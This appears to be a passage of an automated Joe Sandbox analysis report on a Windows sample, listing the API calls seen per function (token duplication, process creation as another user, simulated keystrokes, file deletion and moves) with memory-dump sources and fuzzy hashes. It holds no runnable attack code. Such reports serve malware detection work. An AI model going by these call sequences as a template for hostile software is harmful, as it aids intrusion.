                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __wfsopen
                                          • String ID:
                                          • API String ID: 197181222-0
                                          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                          • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                          • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                          APIs
                                          • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID:
                                          • API String ID: 2962429428-0
                                          • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                          • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                          • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                          • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                          APIs
                                          • Sleep.KERNELBASE(000001F4), ref: 03E822F9
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1729394429.0000000003E80000.00000040.00000020.00020000.00000000.sdmp, Offset: 03E80000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_3e80000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction ID: 759c8b52c6c9b9bb9395d9e8050c0bda9d54a889a3a9898640b5d3790c39b230
                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                          • Instruction Fuzzy Hash: 2FE0E67494010EDFDB00EFB8D54969D7BB4EF04301F1006A1FD05D2280D6309D509A72
                                          APIs
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                          • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                          • GetKeyState.USER32(00000011), ref: 0047C92D
                                          • GetKeyState.USER32(00000009), ref: 0047C936
                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                          • GetKeyState.USER32(00000010), ref: 0047C953
                                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                          • _wcsncpy.LIBCMT ref: 0047CA29
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                          • SendMessageW.USER32 ref: 0047CA7F
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                          • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                          • ImageList_SetDragCursorImage.COMCTL32(00A154F0,00000000,00000000,00000000), ref: 0047CB9B
                                          • ImageList_BeginDrag.COMCTL32(00A154F0,00000000,000000F8,000000F0), ref: 0047CBAC
                                          • SetCapture.USER32(?), ref: 0047CBB6
                                          • ClientToScreen.USER32(?,?), ref: 0047CC17
                                          • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                          • ReleaseCapture.USER32 ref: 0047CC3A
                                          • GetCursorPos.USER32(?), ref: 0047CC72
                                          • ScreenToClient.USER32(?,?), ref: 0047CC80
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                          • SendMessageW.USER32 ref: 0047CD12
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                          • SendMessageW.USER32 ref: 0047CD80
                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                          • GetCursorPos.USER32(?), ref: 0047CDC8
                                          • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                          • GetParent.USER32(00000000), ref: 0047CDF7
                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                          • SendMessageW.USER32 ref: 0047CE93
                                          • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,009D1A00,00000000,?,?,?,?), ref: 0047CF1C
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                          • SendMessageW.USER32 ref: 0047CF6B
                                          • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,009D1A00,00000000,?,?,?,?), ref: 0047CFE6
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                          • String ID: @GUI_DRAGID$F
                                          • API String ID: 3100379633-4164748364
                                          • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                          • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                          • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                          • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 00434420
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                          • IsIconic.USER32(?), ref: 0043444F
                                          • ShowWindow.USER32(?,00000009), ref: 0043445C
                                          • SetForegroundWindow.USER32(?), ref: 0043446A
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                          • GetCurrentThreadId.KERNEL32 ref: 00434485
                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                          • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                          • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                          • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                          • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                          • keybd_event.USER32(00000012,00000000), ref: 00434514
                                          • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 2889586943-2988720461
                                          • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                          • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                          • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                          • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                          APIs
                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                          • CloseHandle.KERNEL32(?), ref: 004463A0
                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                          • GetProcessWindowStation.USER32 ref: 004463D1
                                          • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                          • _wcslen.LIBCMT ref: 00446498
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                          • _wcsncpy.LIBCMT ref: 004464C0
                                          • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                          • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                          • CloseWindowStation.USER32(00000000), ref: 0044656C
                                          • CloseDesktop.USER32(?), ref: 0044657A
                                          • SetProcessWindowStation.USER32(?), ref: 00446588
                                          • CloseHandle.KERNEL32(?), ref: 00446592
                                          • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                          • String ID: $@OH$default$winsta0
                                          • API String ID: 3324942560-3791954436
                                          • Opcode ID: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                          • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                          • Opcode Fuzzy Hash: 4d1d68c1aea3dabcf030405aafb24e1344eb51be90ba82aa3e7b9bd6ceeac822
                                          • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                          APIs
                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                            • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                          • _wcscat.LIBCMT ref: 0044BD94
                                          • _wcscat.LIBCMT ref: 0044BDBD
                                          • __wsplitpath.LIBCMT ref: 0044BDEA
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                          • _wcscpy.LIBCMT ref: 0044BE71
                                          • _wcscat.LIBCMT ref: 0044BE83
                                          • _wcscat.LIBCMT ref: 0044BE95
                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                          • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                          • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                          • FindClose.KERNEL32(00000000), ref: 0044BF33
                                          • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                          • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                          • String ID: \*.*
                                          • API String ID: 2188072990-1173974218
                                          • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                          • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                          • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                          • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                          • FindClose.KERNEL32(00000000), ref: 00478924
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                          • __swprintf.LIBCMT ref: 004789D3
                                          • __swprintf.LIBCMT ref: 00478A1D
                                          • __swprintf.LIBCMT ref: 00478A4B
                                          • __swprintf.LIBCMT ref: 00478A79
                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                          • __swprintf.LIBCMT ref: 00478AA7
                                          • __swprintf.LIBCMT ref: 00478AD5
                                          • __swprintf.LIBCMT ref: 00478B03
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                          • API String ID: 999945258-2428617273
                                          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                          APIs
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                          • __wsplitpath.LIBCMT ref: 00403492
                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                          • _wcscpy.LIBCMT ref: 004034A7
                                          • _wcscat.LIBCMT ref: 004034BC
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                          • _wcscpy.LIBCMT ref: 004035A0
                                          • _wcslen.LIBCMT ref: 00403623
                                          • _wcslen.LIBCMT ref: 0040367D
                                          Strings
                                          • Unterminated string, xrefs: 00428348
                                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                          • _, xrefs: 0040371C
                                          • Error opening the file, xrefs: 00428231
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                          • API String ID: 3393021363-188983378
                                          • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                          • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                          APIs
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                          • FindClose.KERNEL32(00000000), ref: 00431B20
                                          • FindClose.KERNEL32(00000000), ref: 00431B34
                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                          • FindClose.KERNEL32(00000000), ref: 00431BCD
                                          • FindClose.KERNEL32(00000000), ref: 00431BDB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                          • String ID: *.*
                                          • API String ID: 1409584000-438819550
                                          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                          APIs
                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                          • __swprintf.LIBCMT ref: 00431C2E
                                          • _wcslen.LIBCMT ref: 00431C3A
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                          • String ID: :$\$\??\%s
                                          • API String ID: 2192556992-3457252023
                                          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                          APIs
                                          • GetLocalTime.KERNEL32(?), ref: 004722A2
                                          • __swprintf.LIBCMT ref: 004722B9
                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
